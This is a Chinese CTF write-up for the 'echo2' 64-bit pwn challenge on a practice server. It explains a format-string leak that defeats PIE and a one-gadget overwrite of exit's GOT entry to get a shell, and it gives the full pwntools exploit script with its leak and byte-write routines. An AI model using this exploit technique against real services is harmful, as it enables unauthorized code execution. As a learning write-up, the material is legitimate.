hackme pwn echo2 writeup

这题做了好久。。。但是学到了很多很骚的思路

做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。

首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针

第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用pwntools生成的payload来直接打,要自己手动写一波payload,而且还要写多次,这样就不能像echo一样直接把printf的got表的值直接改成system的

那么怎么解决呢?

针对第一个问题,输入一长串%lx,看了下,第41个参数的位置存了一个指针,因为开了pie,所以直接把最低三位给抹去就是基址了

然后针对第二个问题的话,这里就要手动写一波leak和write了

def leak(addr):
    p.sendline('%8$sAAAABBBBCCCC'+p64(addr))
    data=p.recvuntil('AAAABBBB')
    p.recvrepeat(0.1)
    return data[:-8]

def write(b,addr):
    print('write in',hex(addr))
    payload='%'+str(b)+'c%8$hhn'
    payload+='A'*(16-len(payload))
    payload+=p64(addr)
    p.sendline(payload) 
    time.sleep(1)

那么这里能write之后 write哪里,write什么值呢?

看了一波别人的writeup,发现了一个骚操作,在libc里面一个地方是执行了execve(“/bin/sh”, &v48, environ); ,把这个偏移叫做magic值,把exit的got表的值改成libc+magic,那么就直接一发getshell

这里忘记说了,这里的libc是来自网站给的libc,但是如果没libc的话,也可以泄漏出两个函数的libc地址,用libc-database搜一波

最终的代码如下:

from pwn import *
import time

debug=0
if debug:
    p=process('./echo2')
    e=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    magic=0x0D691F
else:
    p=remote('hackme.inndy.tw', 7712)
    e=ELF('./libc.so')
    magic=0x0f0897

context.bits=64
context.log_level='debug'
p.sendline("%41$lx") #得到指向程序的指针

addr=p.recv(12)[:-3]+"000"

addr=int(addr,16)

print(hex(addr))

#gdb.attach(proc.pidof(p)[0])

def leak(addr):
    p.sendline('%8$sAAAABBBBCCCC'+p64(addr))
    data=p.recvuntil('AAAABBBB')
    p.recvrepeat(0.1)
    return data[:-8]

def write(b,addr):
    print('write in',hex(addr))
    payload='%'+str(b)+'c%8$hhn'
    payload+='A'*(16-len(payload))
    payload+=p64(addr)
    p.sendline(payload) 
    time.sleep(1)

#write(16,0x201048+addr)
import struct

printfa=leak(0x201020+addr)[1:] #leak libc地址

printfa=struct.unpack('<Q',printfa+'\x00'*2)[0]

libc=printfa-e.symbols['printf']

magic_addr=magic+libc

print(hex(magic_addr))

magicc=struct.pack('<Q',magic_addr)

for i in range(6):
    write(ord(magicc[i]),addr+0x201048+i)#多次写

p.interactive()
相关文章
相关标签/搜索